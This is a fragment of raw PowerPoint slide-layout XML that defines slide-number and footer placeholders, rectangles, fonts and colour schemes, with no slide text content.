              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3844772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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A04AFAA8-A5E5-4538-A58F-67041F438CE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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{643FB5BB-E4A8-4B45-A8F3-B05F32D5418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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F21DC3-18D9-47EB-8865-6BE113EA8EA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{391D3C29-CA88-4B7D-882E-EA8875BF4520}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41955078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617538"/>
            <a:ext cx="779303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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{635F1E9F-BA2E-40B4-ADED-C0BDD7231A4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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E60B75A8-5840-4C14-8155-ABCE3C669BA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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACBD9765-A09A-482E-9A00-7823A646C0F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7D2B2328-A543-416D-A2A5-C79199D86AA7}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3243148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7D604F98-CC65-4382-A0F4-C3357B038CFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44284438-A154-45BE-A3A2-5E0BA2E8C0DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B703D8C-7CAB-4909-B9C4-D131A19AD8EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F0D68C73-6401-4230-89B5-3CEA20C349CD}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330904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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C406C23F-625D-4EE7-8D01-1B807B5AFAE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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61EC04A1-BF5C-45D9-856C-483F9D7B064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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5AC3C5B-F93A-4BBB-B21C-26A4B7B5DA9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{DEC03EF7-438C-46F4-9971-714C688502BA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3511478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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6477C8D-D18F-4BF6-BAF4-E9DBF51FE9D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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7D20C3E-820C-44E7-AF6A-48A0F67044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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{680BA545-9664-488D-8244-0000A470894F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{232E4094-2D32-4C31-9CC2-F96E885F8AB9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1491236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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{504CE802-88DC-4825-82B1-42FA750679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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF479235-04A8-4C00-AAB0-505F4BEFF6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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8C890B-09C9-4A92-A416-E887D48D0756}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F0327A4B-868E-4FFC-BD1E-D9AA275C04BC}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2431986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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D30E97E7-E443-4A5A-A155-B9C452C1AAC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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFEB4024-2F7D-4439-BECB-DAC0ADA93A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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B9D189E-58F6-4F50-89C4-F7E66061A83F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EDBA344D-43A4-415D-8873-663B0D675778}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2198877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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4706A8CC-2779-469A-BF8F-0922D6AEF43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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{103157DC-FCD3-46C5-AA21-089CBD72AE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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D2DF61F-233D-4816-9929-FB90581E7BD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{74E36B56-F994-42AC-94DA-9BA3C9F80E8D}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1792782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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCB990CF-4B59-43C8-8416-020D5285FAC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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD800F92-70B3-4CB2-BD29-CD9FA6F090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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FA6395B-48FE-40E6-B1E8-8F72CD7DB80D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{C6E15246-E748-4F75-8D72-D6DD75363A14}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2467127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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53964AC9-29A1-4FBC-8AA8-81661503FB2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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6913A519-E96D-44EC-8DD4-761D912627D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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{145D6E99-A6BC-4C72-98F5-4948C4DABD1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{FDA1593D-6CC3-4F62-A6D0-E57D82BF8113}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2528610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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51DFE205-525C-479C-8252-7046749BD32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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE98B288-AAD8-42A9-B40C-9AA891421D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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F488DBB-5F19-4A04-8EDB-E7BC23466DE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{944E0243-F90B-4673-8E90-B321567FCA1F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="693214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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A206C37-52CA-48A2-9392-A050B74B14B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="417513" y="1098550"/>
            <a:ext cx="438150" cy="474663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent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27" name="Rectangle 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18E89412-0D81-452B-880A-127ACD5051E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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28" name="Rectangle 1028">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80EF2F7A-326D-40CA-A1F3-20695D326B59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="541338" y="1520825"/>
            <a:ext cx="422275" cy="474663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="folHlink"/>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29" name="Rectangle 1029">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDFA2C64-6BB2-4580-8328-2C5692815A2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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30" name="Rectangle 1030">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7B3F213-E3D0-4319-A90D-DBDCC6DF8279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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31" name="Rectangle 1031">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8E18BEE-00E0-4435-BEA4-661D4F8BC412}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="762000" y="990600"/>
            <a:ext cx="31750" cy="1052513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:soli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32" name="Rectangle 1032">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C4D64DD-18D9-416D-B0E7-BBC3F1A6AF39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr kumimoji="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr kumimoji="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr kumimoji="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr kumimoji="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr kumimoji="1" sz="24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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1033" name="Rectangle 1033">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F09D4F8C-3E23-40EC-BB0D-1D3C279FD0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC317AE-3425-4C20-A424-75594E7F44B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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48843" name="Rectangle 1035">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9E9C338-E81E-4DE1-A1D9-E74AC81C22FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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kumimoji="0" sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248844" name="Rectangle 1036">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80971750-4F4B-4AA0-A6F5-A79EC6DB9957}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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kumimoji="0" sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248845" name="Rectangle 1037">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E86FA41B-C504-4F65-9E35-260F5378805E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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kumimoji="0" sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0EC9A141-AEB8-44E7-9CEF-F6135B15697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92"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3" r:id="rId13"/>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2.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FF"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
